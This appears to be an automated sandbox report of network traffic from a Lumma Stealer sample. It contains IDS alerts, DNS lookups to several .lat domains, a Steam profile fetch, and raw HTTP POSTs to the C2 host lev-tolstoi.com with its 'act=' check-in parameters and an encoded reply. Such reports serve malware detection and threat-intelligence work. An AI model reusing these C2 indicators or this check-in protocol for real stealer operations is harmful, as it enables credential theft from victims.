2024-12-26T12:57:10.369987+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.8 | 58018 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:12.779136+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-26T12:57:13.585530+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-26T12:57:15.330280+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:16.092621+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:16.092621+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:17.432243+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:18.190258+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:18.190258+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:19.927100+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:20.828002+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:22.644353+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:25.385903+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 12:57:10.829267025 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:10.829320908 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:10.829440117 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:10.840485096 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:10.840497971 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:12.779052973 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:12.779135942 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:12.781810999 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:12.781821966 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:12.782145977 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:12.822258949 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:12.869947910 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:12.911341906 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585557938 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585582972 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585622072 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585644960 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585666895 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585680962 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:13.585717916 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.585741043 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:13.585760117 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:13.782573938 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.782630920 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.782669067 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 26, 2024 12:57:13.782706022 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 26, 2024 12:57:13.782753944 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813101053 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813143015 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813174009 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813195944 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813213110 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813266993 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835074902 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835107088 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835122108 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835129023 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018224955 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018275023 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018379927 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018779993 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018794060 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.330050945 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.330280066 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.332838058 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.332849979 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.333153009 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338102102 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338116884 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338210106 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092619896 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092736959 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092792034 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092966080 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092988014 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.093000889 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.093007088 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127053022 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127101898 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127203941 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127489090 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127504110 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.432085991 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.432243109 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434362888 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434375048 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434793949 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436364889 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436389923 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436501026 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190265894 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190324068 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190356970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190391064 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190417051 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190424919 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190450907 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190462112 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190491915 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190499067 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201265097 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201339960 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201349974 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209037066 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209100008 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209110022 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.259757996 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.311769962 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.353533030 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.400408983 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404155970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404232979 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404251099 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411540031 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411627054 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411634922 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411652088 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411745071 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.412050009 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.412065029 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619740963 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619801998 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619873047 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.620191097 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.620203018 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.926975012 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.927099943 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928695917 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928709984 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928989887 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930366993 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930551052 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930576086 CET44349708172.67.157.254192.168.2.8
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 26, 2024 12:57:08.211463928 CET | 192.168.2.8 | 1.1.1.1 | 0x3c45 | Standard query (0) | aspecteirs.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:08.692867041 CET | 192.168.2.8 | 1.1.1.1 | 0xa11e | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.069993019 CET | 192.168.2.8 | 1.1.1.1 | 0x2d7b | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.293848991 CET | 192.168.2.8 | 1.1.1.1 | 0x429 | Standard query (0) | necklacebudi.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.692827940 CET | 192.168.2.8 | 1.1.1.1 | 0xc869 | Standard query (0) | energyaffai.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.922658920 CET | 192.168.2.8 | 1.1.1.1 | 0x9455 | Standard query (0) | sustainskelet.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.149481058 CET | 192.168.2.8 | 1.1.1.1 | 0xfdd5 | Standard query (0) | crosshuaht.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.369987011 CET | 192.168.2.8 | 1.1.1.1 | 0xfc09 | Standard query (0) | rapeflowwj.lat | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.683758974 CET | 192.168.2.8 | 1.1.1.1 | 0x724d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:13.842747927 CET | 192.168.2.8 | 1.1.1.1 | 0xce40 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 26, 2024 12:57:08.525264025 CET | 1.1.1.1 | 192.168.2.8 | 0x3c45 | Name error (3) | aspecteirs.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:08.912846088 CET | 1.1.1.1 | 192.168.2.8 | 0xa11e | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.292149067 CET | 1.1.1.1 | 192.168.2.8 | 0x2d7b | Name error (3) | discokeyus.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.689445972 CET | 1.1.1.1 | 192.168.2.8 | 0x429 | Name error (3) | necklacebudi.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:09.917278051 CET | 1.1.1.1 | 192.168.2.8 | 0xc869 | Name error (3) | energyaffai.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.146234989 CET | 1.1.1.1 | 192.168.2.8 | 0x9455 | Name error (3) | sustainskelet.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.367129087 CET | 1.1.1.1 | 192.168.2.8 | 0xfdd5 | Name error (3) | crosshuaht.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.680685043 CET | 1.1.1.1 | 192.168.2.8 | 0xfc09 | Name error (3) | rapeflowwj.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:10.821497917 CET | 1.1.1.1 | 192.168.2.8 | 0x724d | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:14.017322063 CET | 1.1.1.1 | 192.168.2.8 | 0xce40 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
| Dec 26, 2024 12:57:14.017322063 CET | 1.1.1.1 | 192.168.2.8 | 0xce40 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• lev-tolstoi.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe |
Timestamp / Bytes transferred / Direction / Data

2024-12-26 11:57:12 UTC, 219 bytes, OUT:
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

2024-12-26 11:57:13 UTC, 1905 bytes, IN:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 26 Dec 2024 11:57:13 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=0554ce0e0c1fbcf08e424b14; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 11:57:13 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 11:57:13 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 11:57:13 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:57:15 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-26 11:57:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-26 11:57:16 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:57:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0poos4lftqri5ukk9gti59jv2e; expires=Mon, 21 Apr 2025 05:43:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQ2iQjvtGVOk4wxcuu%2BYermqv%2BaTxb6OpaLblA1hqFqXDYjEDvDjNNZ89ffuMN7ooDwW%2B3UJpN5cRh3nCzzoM4N9csitSLxYwH0Mz8qAaYGpWOE21iKpWVLppirMq0sKcD0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e46c98cc1a0b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1906&rtt_var=738&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1460000&cwnd=249&unsent_bytes=0&cid=81505d6f12192872&ts=774&x=0"
2024-12-26 11:57:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-26 11:57:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:57:17 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 74
Host: lev-tolstoi.com
2024-12-26 11:57:17 UTC | 74 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-26 11:57:18 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:57:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=i66qudpd8lu6lr0luafltvvmre; expires=Mon, 21 Apr 2025 05:43:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Alxz1CAjOwZsoThQplX%2BxmDoR8WYU%2B%2B0u793sSROZpe7Lcx9rPu82ZcxJsEqIM41MJJW3ua88kKDqjtAwbkv84k%2BweN44IQ6aMfP14THfyN9CHuJ186NYAUA6x6MwNL7r6E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e479bbfd80d0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1461&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1938911&cwnd=208&unsent_bytes=0&cid=4d380383512e7f22&ts=765&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 49 74 66 31 4d 58 70 59 42 44 42 4c 35 53 38 6b 2f 59 75 53 39 6f 4b 64 45 59 54 76 4e 6d 63 62 2f 6d 6b 37 4c 32 67 38 74 43 6a 47 70 72 48 78 32 75 78 78 52 42 2f 52 75 78 53 63 72 77 65 79 63 50 32 41 46 49 72 79 34 77 6f 61 4f 48 2f 76 47 43 68 68 44 4e 59 32 77 57 47 71 54 44 46 45 65 76 56 50 64 63 30 72 30 70 64 53 54 65 44 30 6e 35 65 58 4f 34 36 35 57 79 35 49 66 47 53 34 59 6a 4b 46 4d 58 73 59 42 44 42 4a 35 43 35 30 54 56 76 44 56 73 4c 39 59 63 53 65 51 30 50 76 37 38 6d 61 2b 32 31 74 42 59 6d 6d 52 35 58 51 6e 70 78 78 63 45 35 52 58 33 52 39 53 33 4a 57 6b 38 30 41 78 4c 2b 33 31 35 75 75 57 64 76 76 4b 4b 77 55 32 4f 62 32 30 55 45 36 62 45 45 6b 71 30 57 72 45 41 6b 72 63 37 4a 33 61 56 4b 31 2f 33 65 48 33 2b 38 74 43 6e 74 6f 6e 4b 43
                                                                                                                                                                                                                                                              Data Ascii: Itf1MXpYBDBL5S8k/YuS9oKdEYTvNmcb/mk7L2g8tCjGprHx2uxxRB/RuxScrweycP2AFIry4woaOH/vGChhDNY2wWGqTDFEevVPdc0r0pdSTeD0n5eXO465Wy5IfGS4YjKFMXsYBDBJ5C50TVvDVsL9YcSeQ0Pv78ma+21tBYmmR5XQnpxxcE5RX3R9S3JWk80AxL+315uuWdvvKKwU2Ob20UE6bEEkq0WrEAkrc7J3aVK1/3eH3+8tCntonKC
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 4c 55 49 6e 4c 44 55 47 36 51 37 4e 37 30 62 34 74 59 44 69 56 46 58 75 36 4e 48 48 2b 74 61 65 6e 74 70 69 47 45 4e 38 74 4a 67 46 51 38 59 42 63 52 36 39 48 39 30 33 45 73 32 52 5a 45 50 49 63 54 76 4e 6b 64 36 6e 69 33 76 43 32 67 59 59 51 74 43 4e 76 46 41 75 34 31 68 5a 55 75 68 58 4f 41 4a 4b 6f 59 7a 39 75 34 41 6c 4b 2b 6e 4e 6d 72 36 43 35 71 50 79 4a 31 6b 2b 61 62 43 5a 64 55 4b 2b 41 51 78 66 7a 46 66 56 66 6b 75 68 7a 4e 58 57 41 57 52 4f 6b 4a 6d 2f 77 39 4e 36 6f 74 74 61 55 42 73 31 78 4a 6b 74 51 37 73 4d 4a 56 72 74 57 35 30 32 56 6a 68 31 41 4e 4e 67 4d 55 2b 56 4b 54 72 6e 33 6b 37 6a 68 6e 34 70 64 6a 6d 31 6f 46 41 62 70 6a 6c 74 4c 2f 51 33 49 44 70 72 77 48 43 6c 75 7a 55 6f 63 74 45 46 7a 73 4f 4f 5a 71 4f 66 44 34 56 4b 41 5a 58
